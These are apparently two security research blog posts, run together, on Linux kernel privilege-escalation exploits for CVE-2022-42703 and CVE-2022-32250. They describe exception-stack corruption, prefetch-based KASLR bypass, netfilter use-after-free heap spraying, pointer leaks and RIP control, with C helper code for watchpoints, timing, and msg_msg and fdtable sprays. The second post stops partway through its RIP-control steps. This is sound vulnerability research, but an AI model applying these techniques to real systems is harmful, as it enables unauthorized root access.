This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 — Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel’s memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is and the commit that introduced the bug are great resources in order to gain additional context.
Setting the scene
Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. Calling madvise(…, MADV_PAGEOUT) can then be used to repeatedly trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():
One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.
Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own dedicated slab cache, which means we cannot simply free one and reclaim it with a different object. Instead, we cause the associated anon_vma slab page to be returned to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker-controlled memory.
At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:
It was helpful to emulate the down_read_trylock() in unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer and we cannot modify any non 8-byte aligned values (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide nor figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.
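The behavior described above can be summarized with a small user-space model. This is a simplified sketch and not the kernel implementation: the names model_down_read_trylock, MODEL_FAIL_MASK and MODEL_READER_BIAS are hypothetical, and the model ignores concurrency and anything else the real function may touch.

```c
#include <stdbool.h>
#include <stdint.h>

/* Bits that make the trylock fail: the three low bits and the top bit. */
#define MODEL_FAIL_MASK   ((uint64_t)0x7 | ((uint64_t)1 << 63))
/* Amount added to the counter when a reader takes the lock. */
#define MODEL_READER_BIAS ((uint64_t)0x100)

/* Model of the write described in the text: add 0x100 to *count only if
 * none of the failure bits are set. Returns true when the value changed. */
bool model_down_read_trylock(uint64_t *count)
{
    if (*count & MODEL_FAIL_MASK)
        return false;
    *count += MODEL_READER_BIAS;
    return true;
}
```

Under this model a typical kernel pointer (top bit set) is left untouched, while a small 8-byte-aligned value such as a saved length is bumped by 0x100, which is why saved sizes are a more natural target than pointers.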
Stack corruption…
On x86-64 Linux, when the CPU performs certain interrupts and exceptions, it will swap to a respective stack that is mapped to a static and non-randomized virtual address, with a different stack for the different exception types. A brief documentation of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen KCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel accessible memory even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. This also occurs when the kernel itself generates an Interrupt Stack Table (IST) exception and swaps to an exception stack, except that in that case kernel GPRs are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland triggered exception, register contents are restored from the task stack.
One example of an IST exception is a DB exception which can be triggered by an attacker via a hardware breakpoint, the associated registers of which are described here. Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task context such as during a syscall. That means that it’s possible for an attacker-set hardware breakpoint to be triggered in kernel mode, e.g. during a copy_to/from_user call. The resulting exception will save and restore the kernel context via the aforementioned non-randomized exception stack, and that kernel context is an exceptionally good target for our arbitrary write primitive.
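As an illustration of how such a breakpoint can be armed from the tracer, here is a minimal sketch for x86-64 Linux. It assumes the tracee is already attached and stopped and that addr is 8-byte aligned. The helper names and the DR7_* macros are hypothetical; the bit positions follow the x86 debug register layout, and the debug registers are reached through the u_debugreg array of struct user.

```c
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>

/* DR7 field encodings for debug register slot 0. */
#define DR7_L0         (1UL << 0)  /* local enable for slot 0 */
#define DR7_RW0_SHIFT  16          /* access type field of slot 0 */
#define DR7_LEN0_SHIFT 18          /* access length field of slot 0 */
#define DR7_RW_WRITE   0x1UL       /* trigger on data writes */
#define DR7_RW_RDWR    0x3UL       /* trigger on data reads or writes */
#define DR7_LEN_8      0x2UL       /* watch an 8-byte region */

/* Byte offset of debug register n inside the tracee's struct user. */
#define DEBUGREG_OFFSET(n) \
    (offsetof(struct user, u_debugreg) + (n) * sizeof(unsigned long long))

/* Compute the DR7 value that arms slot 0 with the given type and length. */
unsigned long dr7_arm_slot0(unsigned long rw, unsigned long len)
{
    return DR7_L0 | (rw << DR7_RW0_SHIFT) | (len << DR7_LEN0_SHIFT);
}

/* Arm a write watchpoint on addr in a traced, stopped process.
 * Returns 0 on success and -1 on failure (errno is set by ptrace). */
int set_hw_watchpoint(pid_t pid, unsigned long addr)
{
    unsigned long dr7 = dr7_arm_slot0(DR7_RW_WRITE, DR7_LEN_8);

    /* DR0 holds the watched address, DR7 holds the control bits. */
    if (ptrace(PTRACE_POKEUSER, pid, DEBUGREG_OFFSET(0), (void *)addr) == -1)
        return -1;
    if (ptrace(PTRACE_POKEUSER, pid, DEBUGREG_OFFSET(7), (void *)dr7) == -1)
        return -1;
    return 0;
}
```

A write watchpoint is used here because copy_to_user writes to the watched user address; for a copy_from_user target the read/write encoding would be the natural choice.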
Any of the registers that copy_to/from_user is actively using at the time it handles the hardware breakpoint are corruptible by using our arbitrary-write primitive to overwrite their saved values on the exception stack. In this case, the size of the copy_user call is the intuitive target. The size value is consistently stored in the rcx register, which will be saved at the same virtual address every time the hardware breakpoint is hit. After we corrupt this saved register with our arbitrary write primitive, the kernel will restore rcx from the exception stack once it returns to copy_to/from_user. Since rcx defines the number of bytes copy_user should copy, this corruption will cause the kernel to illicitly copy too many bytes between userland and the kernel.
…begets stack corruption
The attack strategy starts as follows:
Fork a process Y from process X.
Process X ptraces process Y, then sets a hardware breakpoint at a known virtual address [addr] in process Y.
Process Y makes a large number of calls to uname(2), which calls copy_to_user from a kernel stack buffer to [addr]. This causes the kernel to constantly trigger the hardware watchpoint and enter the DB exception handler, using the DB exception stack to save and restore copy_to_user state.
Simultaneously make many arbitrary writes at the known location of the DB exception stack’s saved rcx value, which is Process Y’s copy_to_user’s saved length.
The DB exception stack is used rarely, so it’s unlikely that we corrupt any unexpected kernel state via a spurious DB exception while spamming our arbitrary write primitive. The technique is also racy, but missing the race simply means corrupting stale stack-data. In that case, we simply try again. In my experience, it rarely takes more than a few seconds to win the race successfully.
Upon successful corruption of the length value, the kernel will copy much of the current task’s stack back to userland, including the task-local stack cookie and return addresses. We can subsequently invert our technique and attack a copy_from_user call instead. Instead of copying too many bytes from the kernel task stack to userland, we cause the kernel to copy too many bytes from userland to the kernel task stack! Again we use a syscall, prctl(2), that performs a copy_from_user call to a kernel stack buffer. Now by corrupting the length value, we generate a stack buffer overflow condition in this function where none previously existed. Since we’ve already leaked the stack cookie and the KASLR slide, it is trivially easy to bypass both mitigations and overwrite the return address.
Completing a ROP chain for the kernel is left as an exercise to the reader.
Fetching the KASLR slide with prefetch
Upon reporting this bug to the Linux kernel security team, our suggestion was to start randomizing the location of the percpu cpu_entry_area (CEA), and consequently the associated exception and syscall entry stacks. This is an effective mitigation against remote attackers but is insufficient to prevent a local attacker from taking advantage. In 2016, Daniel Gruss et al. discovered a new, more reliable technique for exploiting the TLB timing side channel in x86 CPUs. Their results demonstrated that prefetch instructions executed in user mode retired at statistically significant different latencies depending on whether the requested virtual address to be prefetched was mapped vs unmapped, even if that virtual address was only mapped in kernel mode. kPTI was helpful in mitigating this side channel; however, most modern CPUs now have innate protection for Meltdown, which kPTI was specifically designed to address, and thus kPTI (which has significant performance implications) is disabled on modern microarchitectures. That decision means it is once again possible to take advantage of the prefetch side channel to defeat not only KASLR, but also the CPU entry area randomization mitigation, preserving the viability of the CEA stack corruption exploit technique against modern x86 CPUs.
There are surprisingly few fast and reliable examples of this prefetch KASLR bypass technique available in the open source realm, so I made the decision to write one.
Implementation
The meat of implementing this technique effectively is in serially reading the processor’s time stamp counter before and after performing a prefetch. Daniel Gruss helpfully provided highly effective and open source code for doing just that. The only edit I made (as suggested by Jann Horn) was to swap to using lfence instead of cpuid as the serializing instruction, as cpuid is emulated in VM environments. It also became apparent in practice that there was no need to perform any cache-flushing routines in order to witness the side-channel effect. It is simply enough to time every prefetch attempt.
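The core measurement can be sketched as follows. This is not the code referenced above, only a minimal x86-64 illustration of the same idea: read the time stamp counter, issue the prefetch hints, and read the counter again, with lfence used around each read as the text describes. The function names are hypothetical.

```c
#include <stdint.h>

/* Read the time stamp counter with lfence on both sides, so the read is
 * ordered against the instructions before and after it. */
static inline uint64_t rdtsc_fenced(void)
{
    uint32_t lo, hi;
    __asm__ volatile("lfence\n\trdtsc\n\tlfence"
                     : "=a"(lo), "=d"(hi)
                     :
                     : "memory");
    return ((uint64_t)hi << 32) | lo;
}

/* Time one pair of prefetch hints against addr, in TSC ticks. The prefetch
 * instructions do not fault, so addr may be any virtual address. */
uint64_t time_prefetch(const void *addr)
{
    uint64_t start = rdtsc_fenced();
    __asm__ volatile("prefetchnta (%0)\n\t"
                     "prefetcht2 (%0)"
                     :
                     : "r"(addr)
                     : "memory");
    uint64_t end = rdtsc_fenced();
    return end - start;
}
```

A single measurement is noisy, so a caller would normally repeat time_prefetch() several times per address and post-process the samples.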
Generating prefetch timings for all 512 possible KASLR slots yields quite a bit of fuzzy data in need of analyzing. To minimize noise, multiple samples of each tested address are taken, and the minimum value from that set of samples is used in the results as the representative value for an address. On the Tiger Lake CPU this test was primarily performed on, no more than 16 samples per slot were needed to generate exceptionally reliable results. Low-resolution minimum prefetch time slot identification narrows down the area to search in while avoiding false positives for the higher resolution edge-detection code which finds the precise address at which prefetch dramatically drops in run-time. The result of this effort is a PoC which can correctly identify the KASLR slide on my local machine with 99.999% accuracy (95% accuracy in a VM) while running faster than it takes to grep through kallsyms for the kernel base address:
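The low-resolution pass described above can be sketched like this. The constants are assumptions for a typical x86-64 configuration (a kernel text range starting at 0xffffffff80000000 with 2 MiB slot granularity), and the helper names are hypothetical. The sketch also assumes that the mapped slot is the one with the lowest minimum timing, which matches the drop in prefetch run-time mentioned in the text; the higher-resolution edge detection is not shown.

```c
#include <stddef.h>
#include <stdint.h>

#define KASLR_BASE  0xffffffff80000000ULL /* assumed start of the text range */
#define KASLR_ALIGN 0x200000ULL           /* assumed 2 MiB slot granularity */
#define KASLR_SLOTS 512                   /* number of slots, as in the text */

/* Virtual address of candidate slot i. */
uint64_t slot_address(size_t i)
{
    return KASLR_BASE + (uint64_t)i * KASLR_ALIGN;
}

/* Smallest value in a set of samples; taking the minimum discards the
 * slow outliers caused by interrupts and other noise. */
uint64_t min_sample(const uint64_t *samples, size_t n)
{
    uint64_t best = UINT64_MAX;
    for (size_t i = 0; i < n; i++)
        if (samples[i] < best)
            best = samples[i];
    return best;
}

/* Index of the slot whose representative (minimum) timing is lowest.
 * Ties resolve to the lowest index. */
size_t fastest_slot(const uint64_t *slot_minimums, size_t n)
{
    size_t best = 0;
    for (size_t i = 1; i < n; i++)
        if (slot_minimums[i] < slot_minimums[best])
            best = i;
    return best;
}
```

In use, each of the KASLR_SLOTS addresses would be sampled up to 16 times, reduced with min_sample(), and the resulting array passed to fastest_slot() to pick the region for the finer search.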
This prefetch code does indeed work to find the locations of the randomized CEA regions in Peter Zijlstra’s proposed patch. However, the journey to that point results in code that demonstrates another deeply significant issue: KASLR is comprehensively compromised on x86 against local attackers, and has been for the past several years, and will be for the indefinite future. There are presently no plans in place to resolve the myriad microarchitectural issues that lead to side channels like this one. Future work is needed in this area in order to preserve the integrity of KASLR, or alternatively, it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.
Conclusion
This exploit demonstrates a highly reliable and agnostic technique that can allow a broad spectrum of uncontrolled arbitrary write primitives to achieve kernel code execution on x86 platforms. While it is possible to mitigate this exploit technique from a remote context, an attacker in a local context can utilize known microarchitectural side-channels to defeat the current mitigations. Additional work in this area might be valuable to continue to make exploitation more difficult, such as performing in-stack randomization so that the stack offset of the saved state changes on every taken IST exception. For now, however, this remains a viable and powerful exploit strategy on x86 Linux.
It’s been a while since our last technical blogpost, so here’s one right on time for the Christmas holidays. We describe a method to exploit a use-after-free in the Linux kernel when objects are allocated in a specific slab cache, namely the kmalloc-cg series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.
The use-after-free vulnerability in the Linux kernel netfilter subsystem was discovered by NCC Group’s Exploit Development Group (EDG). They published a very detailed write-up with an in-depth analysis of the vulnerability and an exploitation strategy that targeted Linux kernel version 5.13. Additionally, Theori published their own analysis and exploitation strategy, this time targeting Linux kernel version 5.15. We strongly recommend having a thorough read of both articles to better understand the vulnerability prior to reading this post, which almost exclusively focuses on an exploitation strategy that works on the latest vulnerable version of the Linux kernel, version 5.18.1.
The aforementioned exploitation strategies are different from each other and from the one detailed here since the targeted kernel versions have different peculiarities. In version 5.13, allocations performed with either the GFP_KERNEL flag or the GFP_KERNEL_ACCOUNT flag are served by the kmalloc-* slab caches. In version 5.15, allocations performed with the GFP_KERNEL_ACCOUNT flag are served by the kmalloc-cg-* slab caches. While in both 5.13 and 5.15 the affected object, nft_expr, is allocated using GFP_KERNEL, the difference in exploitation between them arises because a commonly used heap spraying object, the System V message structure (struct msg_msg), is served from kmalloc-* in 5.13 but from kmalloc-cg-* in 5.15. Therefore, in 5.15, struct msg_msg cannot be used to exploit this vulnerability.
In 5.18.1, the object involved in the use-after-free vulnerability, nft_expr, is itself allocated with GFP_KERNEL_ACCOUNT in the kmalloc-cg-* slab caches. Since the exploitation strategies presented by the NCC Group and Theori rely on objects allocated with GFP_KERNEL, they do not work against the latest vulnerable version of the Linux kernel.
This blog post presents a strategy that works on the latest vulnerable version of the Linux kernel.
Vulnerability
Netfilter sets can be created with a maximum of two associated expressions that have the NFT_EXPR_STATEFUL flag. The vulnerability occurs when a set is created with an associated expression that does not have the NFT_EXPR_STATEFUL flag, such as the dynset and lookup expressions. These two expressions have a reference to another set for updating and performing lookups, respectively. Additionally, to enable tracking, each set has a bindings list that specifies the objects that have a reference to it.
During the allocation of the associated dynset or lookup expression objects, references to the objects are added to the bindings list of the referenced set. However, when the expression associated with the set does not have the NFT_EXPR_STATEFUL flag, the creation is aborted and the allocated expression is destroyed. The problem occurs during the destruction process, where the bindings list of the referenced set is not updated to remove the reference, effectively leaving a dangling pointer to the freed expression object. Whenever the set containing the dangling pointer in its bindings list is referenced again and its bindings list has to be updated, a use-after-free condition occurs.
Exploitation
Before jumping straight into exploitation details, first let’s see the definition of the structures involved in the vulnerability:
The nft_set structure represents an nftables set, a built-in generic infrastructure of nftables that allows using any supported selector to build sets, which makes it possible to represent maps and verdict maps (check the corresponding nftables wiki entry for more details).
The nft_lookup and nft_dynset expressions have to be bound to a given set on which the add, delete, or update operations will be performed.
When a given nft_set has expressions bound to it, they are added to the nft_set.bindings doubly linked list. A visual representation of an nft_set with 2 expressions is shown in the diagram below.
The binding member of the nft_lookup and nft_dynset expressions is defined as follows:
// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L576
/**
 * struct nft_set_binding - nf_tables set binding
 *
 * @list: set bindings list node
 * @chain: chain containing the rule bound to the set
 * @flags: set action flags
 *
 * A set binding contains all information necessary for validation
 * of new elements added to a bound set.
 */
struct nft_set_binding {
    struct list_head list;
    const struct nft_chain *chain;
    u32 flags;
};
The important member in our case is the list member. It is of type struct list_head, the same as the nft_lookup.binding and nft_dynset.binding members. These are the foundation for building a doubly linked list in the kernel. For more details on how linked lists in the Linux kernel are implemented, refer to this article.
With this information, let’s see what the vulnerability allows us to do. Since the UAF occurs within a doubly linked list, let’s review the common operations on such lists and what that implies in our scenario. Instead of showing a generic example, we are going to use the linked list that is built with the nft_set and the expressions that can be bound to it.
In the diagram shown above, the simplified pseudo-code for removing the
expressions are defined at different offsets, the write operation is done at different offsets.
With this out of the way we can now list the write primitives that this vulnerability allows, depending on which expression is the vulnerable one:
nft_lookup: Write an 8-byte address at offset 24 (binding.list->next) or offset 32 (binding.list->prev) of a freed nft_lookup object.
nft_dynset: Write an 8-byte address at offset 64 (binding.list->next) or offset 72 (binding.list->prev) of a freed nft_dynset object.
The offsets mentioned above take into account the fact that nft_lookup and nft_dynset expressions are bundled in the data member of an nft_expr object (the data member is at offset 8).
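To make the write primitive concrete, the following user-space sketch rebuilds the list operations and shows how linking or unlinking a neighbour writes a pointer into a node that is still on the list but treated as freed. struct mock_expr is a hypothetical stand-in whose padding merely reproduces the offsets 24 and 32 quoted for nft_lookup on a 64-bit build; it is not the real kernel layout. The sketch also assumes new bindings are appended at the tail of the list.

```c
#include <stddef.h>
#include <stdint.h>

/* Minimal copy of the kernel's circular doubly linked list node. */
struct list_head { struct list_head *next, *prev; };

/* Hypothetical layout that places the list node at offset 24. */
struct mock_expr {
    void *ops;              /* offset 0: expression ops pointer */
    void *set;              /* offset 8: start of the data member */
    uint8_t regs[8];        /* offset 16: small fields plus padding */
    struct list_head list;  /* offset 24: binding.list (next), 32 (prev) */
};

void list_init(struct list_head *head)
{
    head->next = head;
    head->prev = head;
}

/* Append entry before head, i.e. at the tail of the list. */
void list_add_tail(struct list_head *entry, struct list_head *head)
{
    entry->prev = head->prev;
    entry->next = head;
    head->prev->next = entry;  /* write into the previous tail's next */
    head->prev = entry;
}

/* Unlink entry; both neighbours are written to. */
void list_unlink(struct list_head *entry)
{
    entry->next->prev = entry->prev;
    entry->prev->next = entry->next;
}

/* Reproduce the shape of the bug with ordinary memory: 'stale' stays on
 * the list although it is treated as freed, then 'live' is appended.
 * Returns the pointer that was written into stale->list.next. */
struct list_head *write_into_stale(struct list_head *bindings,
                                   struct mock_expr *stale,
                                   struct mock_expr *live)
{
    list_init(bindings);
    list_add_tail(&stale->list, bindings);
    /* The buggy destroy path would free 'stale' here without unlinking. */
    list_add_tail(&live->list, bindings);
    return stale->list.next;
}
```

Appending the second entry stores the address of its list node at offset 24 of the stale object, and unlinking it later stores the address of the list head there instead; whatever object has reclaimed the freed memory receives those writes.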
In order to do something useful with the limited write primitives that the vulnerability offers, we need to find objects allocated within the same slab caches as the nft_lookup and nft_dynset expression objects that have an interesting member at the listed offsets.
Therefore, the objects suitable for exploitation will be different from those of the publicly available exploits targeting versions 5.13 and 5.15.
Exploit Strategy
The ultimate primitives we need to exploit this vulnerability are the following:
Memory leak primitive: Mainly to defeat KASLR.
RIP control primitive: To achieve kernel code execution and escalate privileges.
However, neither of these can be achieved by only using the 8-byte write primitive that the vulnerability offers. The 8-byte write primitive on a freed object can be used to corrupt the object replacing the freed allocation. This can be leveraged to force a partial free on either the nft_set, nft_lookup or the nft_dynset objects.
Partially freeing nft_lookup and nft_dynset objects can help with leaking pointers, while partially freeing an nft_set object can be pretty useful to craft a partial fake nft_set to achieve RIP control, since it has an ops member that points to a function table.
Therefore, the high-level exploitation strategy would be the following:
Leak the kernel image base address.
Leak a pointer to an nft_set object.
Obtain RIP control.
Escalate privileges by overwriting the kernel’s MODPROBE_PATH global variable.
Return execution to userland and drop a root shell.
The following sub-sections describe how this can be achieved.
Partial Object Free Primitive
A partial object free primitive can be built by looking for a kernel object allocated with GFP_KERNEL_ACCOUNT within kmalloc-cg-64 or kmalloc-cg-96, with a pointer at offset 24 or 32 for kmalloc-cg-64 or at offset 64 or 72 for kmalloc-cg-96. Afterwards, when the object of interest is destroyed, kfree() has to be called on that pointer in order to partially free the targeted object.
One such object is the fdtable object, which is meant to hold the file descriptor table for a given process. Its definition is shown below.
// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/fdtable.h#L27
struct fdtable {
    unsigned int max_fds;                  /*  0   4 */
    /* XXX 4 bytes hole, try to pack */
    struct file * * fd;                    /*  8   8 */
    long unsigned int * close_on_exec;     /* 16   8 */
    long unsigned int * open_fds;          /* 24   8 */
    long unsigned int * full_fds_bits;     /* 32   8 */
    struct callback_head rcu __attribute__((__aligned__(8))); /* 40  16 */
    /* size: 56, cachelines: 1, members: 6 */
    /* sum members: 52, holes: 1, sum holes: 4 */
    /* forced alignments: 1 */
    /* last cacheline: 56 bytes */
} __attribute__((__aligned__(8)));
An fdtable object is 56 bytes in size, so it is allocated in the kmalloc-cg-64 slab cache and can thus be used to replace nft_lookup objects. It has a member of interest at offset 24 (open_fds), which is a pointer to an unsigned long integer array. The allocation of fdtable objects is done by the kernel function alloc_fdtable(), which can be reached with the following call stack.
pointer can be triggered by simply terminating the child process that allocated the fdtable object.
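A spray built on child processes might look like the sketch below. The helper names are hypothetical. It rests on an assumption that is not spelled out in the text: a process holding more than 64 open descriptors no longer fits the default descriptor table, so each forked child gets a separately allocated fdtable. That would be consistent with the later step that duplicates stdout 65 times before spraying.

```c
#include <signal.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Duplicate stdout 'extra' times; returns how many duplicates succeeded. */
int grow_fd_table(int extra)
{
    int made = 0;
    for (int i = 0; i < extra; i++) {
        if (dup(STDOUT_FILENO) < 0)
            break;
        made++;
    }
    return made;
}

/* Fork 'count' children that sleep until they are killed. Each child
 * receives its own copy of the parent's descriptor table.
 * Returns the number of children created. */
size_t spray_children(pid_t *pids, size_t count)
{
    size_t n = 0;
    for (; n < count; n++) {
        pid_t pid = fork();
        if (pid < 0)
            break;
        if (pid == 0) {
            for (;;)
                pause();  /* child: hold the table until SIGKILL */
        }
        pids[n] = pid;
    }
    return n;
}

/* Terminate and reap the children, releasing their descriptor tables. */
void release_children(const pid_t *pids, size_t count)
{
    for (size_t i = 0; i < count; i++) {
        kill(pids[i], SIGKILL);
        waitpid(pids[i], NULL, 0);
    }
}
```

Keeping the spray and the release as separate calls lets the exploit decide exactly when the frees happen, which matters because the release is what triggers the partial free.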
Leaking Pointers
The exploit primitive provided by this vulnerability can be used to build a leaking primitive by overwriting the vulnerable object with an object that has an area that will be copied back to userland. One such object is the System V message represented by the msg_msg structure, which is allocated in kmalloc-cg-* slab caches starting from kernel version 5.14.
The msg_msg structure acts as a header of System V messages that can be created via the userland msgsnd() function. The content of the message can be found right after the header within the same allocation. System V messages are a widely used exploit primitive for heap spraying.
Since the size of the allocation for a System V message can be controlled, it is possible to allocate it in both kmalloc-cg-64 and kmalloc-cg-96 slab caches.
It is important to note that any data to be leaked must be written past the first 48 bytes of the message allocation, otherwise it would overwrite the msg_msg header. This restriction rules out the nft_lookup object as a candidate for this technique, as it is only possible to write the pointer either at offset 24 or offset 32 within the object. The ability to overwrite the msg_msg.m_ts member, which defines the size of the message, would help build a strong out-of-bounds read primitive if the value is large enough. However, there is a check in the code to ensure that the m_ts member is not negative when interpreted as a signed long integer, and heap addresses start with 0xffff, making them negative long integers.
Leaking an nft_set Pointer
Leaking a pointer to an nft_set object is quite simple with the memory leak primitive described above. The steps to achieve it are the following:
1. Create a target set to which the expressions will be bound.
2. Create a rule with a lookup expression bound to the target set from step 1.
3. Create a set with an embedded nft_dynset expression bound to the target set. Since this is considered an invalid expression to be embedded in a set, the nft_dynset object will be freed but not removed from the target set bindings list, causing a UAF.
4. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed nft_dynset object (via the msgsnd() function). Tag all the messages at offset 24 so the one corrupted with the nft_set pointer can later be identified.
5. Remove the rule created, which will remove the entry of the nft_lookup expression from the target set’s bindings list. Removing this from the list effectively writes a pointer to the target nft_set object where the original binding.list.prev member was (offset 72). Since the freed nft_dynset object was replaced by a System V message, the pointer to the nft_set will be written at offset 24 within the message data.
6. Use the userland msgrcv() function to read the messages and check which one does not have the tag anymore, as it would have been replaced by the pointer to the nft_set.
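The message handling in steps 4 and 6 can be sketched with the standard System V message queue calls. The helper names, the tag handling and the 48-byte payload are illustrative assumptions: 48 bytes of data plus the 48-byte header give a 96-byte allocation. The queue identifier is assumed to come from msgget(), and because a single queue can only hold a limited number of bytes, a real spray would typically spread messages across several queues.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

#define MSG_HEADER_SIZE 48  /* size of the msg_msg header, per the text */
#define MSG_DATA_SIZE   48  /* 48 + 48 = 96 bytes, targeting kmalloc-cg-96 */

struct spray_msg {
    long mtype;                 /* must be positive for msgsnd() */
    char mtext[MSG_DATA_SIZE];  /* user data stored after the header */
};

/* Translate an offset within the kernel allocation into an offset within
 * the message data; returns -1 if it falls inside the header. */
long data_offset(size_t alloc_offset)
{
    if (alloc_offset < MSG_HEADER_SIZE)
        return -1;
    return (long)(alloc_offset - MSG_HEADER_SIZE);
}

/* Build a zeroed message carrying an 8-byte tag at tag_off.
 * The caller must keep tag_off + 8 within MSG_DATA_SIZE. */
void build_tagged_msg(struct spray_msg *m, uint64_t tag, size_t tag_off)
{
    memset(m, 0, sizeof(*m));
    m->mtype = 1;
    memcpy(m->mtext + tag_off, &tag, sizeof(tag));
}

/* Send up to count tagged messages to queue qid without blocking;
 * returns the number actually queued. */
size_t spray_msgs(int qid, size_t count, uint64_t tag, size_t tag_off)
{
    struct spray_msg m;
    size_t sent = 0;

    build_tagged_msg(&m, tag, tag_off);
    while (sent < count &&
           msgsnd(qid, &m, sizeof(m.mtext), IPC_NOWAIT) == 0)
        sent++;
    return sent;
}

/* Return 1 if the tag at tag_off is gone, i.e. something overwrote it. */
int tag_overwritten(const struct spray_msg *m, uint64_t tag, size_t tag_off)
{
    return memcmp(m->mtext + tag_off, &tag, sizeof(tag)) != 0;
}
```

data_offset(72) evaluates to 24, which is the mapping used in step 5, while the nft_lookup offsets 24 and 32 fall inside the header and are rejected.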
Leaking a Kernel Function Pointer
Leaking a kernel pointer requires a bit more work than leaking a pointer to an nft_set object. It requires being able to partially free objects within the target set bindings list as a means of crafting use-after-free conditions. This can be done with the partial object free primitive based on the fdtable object described earlier. The steps followed to leak a pointer to a kernel function are the following.
1. Increase the number of open file descriptors by calling dup() on stdout 65 times.
2. Create a target set to which the expressions will be bound (different from the one used in the `nft_set` address leak).
3. Create a set with an embedded nft_lookup expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the nft_lookup object will be freed but not removed from the target set bindings list, causing a UAF.
4. Spray fdtable objects in order to replace the freed nft_lookup from step 3.
5. Create a set with an embedded nft_dynset expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the nft_dynset object will be freed but not removed from the target set bindings list, causing a UAF. This addition to the bindings list will write the pointer to its binding member into the open_fds member of the fdtable object (allocated in step 4) that replaced the nft_lookup object.
6. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed nft_dynset object (via the msgsnd() function). Tag all the messages at offset 8 so the one corrupted can be identified.
7. Kill all the child processes created in step 4 in order to trigger the partial free of the System V message that replaced the nft_dynset object, effectively causing a UAF to a part of a System V message.
8. Spray time_namespace objects in order to replace the System V message that was partially freed in step 7. The reason for using the time_namespace objects is explained later.
9. Since the System V message header was not corrupted, find the System V message whose tag has been overwritten. Use msgrcv() to read the data from it, which is overlapping with the newly allocated time_namespace object. Offset 40 of the data portion of the System V message corresponds to the time_namespace.ns.ops member, which points to a function table defined within the kernel core. Armed with this information and the knowledge of the offset from the kernel image base to this function table, it is possible to calculate the kernel image base address.
10. Clean up the child processes used to spray the time_namespace objects.
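The arithmetic behind step 9 is a single subtraction, sketched below together with the follow-up relocation of addresses taken from the unslid image. The helper names are hypothetical, and the offset of the leaked table is build-specific, so it has to be looked up for the exact target kernel.

```c
#include <stdint.h>

/* Recover the kernel image base from a leaked pointer, given the known
 * offset of the leaked symbol from the image base for this build. */
uint64_t kernel_base_from_leak(uint64_t leaked, uint64_t symbol_offset)
{
    return leaked - symbol_offset;
}

/* Relocate an address taken from the unslid image (for example a gadget
 * found offline) to its location in the running kernel. */
uint64_t rebase(uint64_t unslid_addr, uint64_t unslid_base,
                uint64_t real_base)
{
    return unslid_addr - unslid_base + real_base;
}
```

For example, with a made-up table offset of 0x1234560, a leaked value of 0xffffffff9c234560 gives an image base of 0xffffffff9b000000, and every gadget address can then be shifted by the same amount.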
time_namespace objects are interesting because they contain an ns_common structure embedded in them, which in turn contains an ops member that points to a function table with functions defined within the kernel core.
The ops->delete member is executed when an item has to be removed from the set. The item removal can be done from a rule that removes an element from a set when certain criteria are matched. Using the
The snippet above shows the creation of a table, a chain, and a set that contains elements of type ipv4_addr (i.e. IPv4 addresses). Then a rule is added, which deletes the item 127.0.0.1 from the set my_set when an incoming packet has the source IPv4 address 127.0.0.1. Whenever a packet matching those criteria is processed via nftables, the delete function pointer of the specified set is called.
Therefore, RIP control can be achieved with the following steps. Consider the target set to be the nft_set object whose address was already obtained.
Add a rule to the table being used for exploitation in which an item is removed from the target set when the source IP of incoming packets is 127.0.0.1.
Partially free the nft_set object whose address was obtained.
Spray System V messages containing a partially fake nft_set object with a fake ops table, with a given value for the ops->delete member.
